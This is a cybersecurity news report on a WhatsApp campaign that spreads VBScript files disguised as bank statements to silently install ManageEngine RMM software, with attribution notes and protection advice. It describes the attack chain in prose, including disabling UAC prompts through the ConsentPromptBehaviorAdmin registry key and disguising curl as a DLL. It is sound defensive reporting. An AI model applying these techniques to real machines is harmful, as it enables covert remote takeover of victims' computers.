WhatsApp Malware Campaign Spreads RMM Software

At a glance

• Actor: Suspected Chinese-speaking threat actor (low confidence)
• Activity Type: Malware distribution and silent RMM installation
• Targets: Individual users globally (heavy focus on Malaysia)
• Scale: Broad opportunistic targeting; thousands of potential victims
• Jurisdiction: Active campaign; no law enforcement actions announced
• Source: Kaspersky Labs and Broadcom

TL;DR

A new WhatsApp malware campaign uses hijacked accounts to send malicious VBScript files. This complex VBScript infection chain ultimately installs legitimate Remote Monitoring and Management (RMM) software. Consequently, attackers gain silent, persistent control over the victim’s computer.

What happened

In June 2026, researchers uncovered an active malware operation spreading through WhatsApp direct messages. Attackers compromise WhatsApp accounts and message the victims’ contacts. They send malicious attachments disguised as financial documents. These fake documents use names like “Account Statement.vbs” or “Billing Statement.vbs”.

The attackers localize these filenames into multiple languages. For instance, they use “Aviso de dívida.vbs” for Portuguese targets and “Penyata bank.vbs” for victims in Malaysia. This localization tactic helps them trick users in different geographic regions. When a user opens the attachment, a multi-stage VBScript infection chain begins. The execution method depends on the platform. On WhatsApp Desktop, the app directly launches the script. On WhatsApp Web, the user typically executes the downloaded file from their browser history.

Stage 1: Initial Download

First, the script creates a hidden working directory on the system. It uses random folder names like “MSUpdate_12345” to hide its tracks. Then, the script downloads two secondary payloads from remote servers. It renames standard Windows tools like curl.exe to look like harmless DLL files.

The scripts also use heavy obfuscation to hide their true purpose. According to a Kaspersky Labs report, “The threat actor uses deceptive file names masquerading as business and financial documents to persuade recipients to download and execute the attachment.” Furthermore, researchers at Broadcom confirmed that these fake invoices trigger a multi-stage execution process.

Stage 2: UAC Bypass and ZIP Extraction

Next, the VBScript infection chain splits into two distinct paths. One script attempts to bypass Windows User Account Control (UAC). It repeatedly tries to modify the ConsentPromptBehaviorAdmin registry key. Setting this key to zero allows administrative actions without user prompts. The script loops this command every 450 milliseconds.

Meanwhile, the second script downloads a ZIP archive. This archive contains a ManageEngine Endpoint Central deployment package. The script silently extracts the archive using the Windows Shell COM interface. It also removes security warnings from the downloaded files.

Stage 3: RMM Installation

Finally, a new setup script initiates the software deployment. It checks for the necessary installation files. The script then requests administrative privileges if it lacks them. Once elevated, it installs the RMM software using msiexec.exe.

This installation occurs silently in the background. ManageEngine Endpoint Central is a legitimate enterprise tool. However, attackers abuse its remote administration features to control victim machines.

Who is behind it

Security researchers suspect a Chinese-speaking threat actor operates this WhatsApp malware campaign. However, they assign low confidence to this attribution. Analysts discovered extensive Chinese-language comments inside the malicious scripts. These comments describe system integrity checks and deployment logic.

Furthermore, the command-and-control infrastructure overlaps with known threats. Specifically, one IP address (202.61.160.201) previously hosted ValleyRAT and Ghost RAT activity. This overlap suggests a potential connection. Still, authorities have not charged any individuals in connection with this operation.

Impact or scale

This WhatsApp malware campaign affects users on a global scale. The infection spans across Malaysia, Brazil, India, Mexico, Singapore, the UK, and several other nations. Notably, telemetry shows that 80% of the victims reside in Malaysia.

The attackers cast a wide net instead of targeting specific industries. They target individual consumers rather than large corporations. Successful exploitation grants the attackers full remote access to the infected machines. Consequently, they can steal personal data or deploy additional malware payloads.

What comes next and protection

This operation remains active today. Users must exercise extreme caution with unexpected messages. Therefore, you should never open script files like VBS, BAT, or CMD from chat applications. You should always verify unexpected financial documents with the sender through a phone call.

Broadcom notes that standard endpoint protection policies, such as Carbon Black, can block these suspicious scripting host processes. Additionally, network defenders should monitor for unauthorized ManageEngine Endpoint Central installations. You should block known malicious IPs associated with this campaign. Finally, keeping your operating system and security software updated will help prevent these attacks.

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy

Written by

@DdoS · Security Researcher

Do Son

Do Son is the Founder and Editor of SecurityOnline.info. Working in cybersecurity since 2013, he reports on vulnerabilities, malware, and emerging threats, providing timely analysis to help organizations and individuals stay ahead of evolving risks.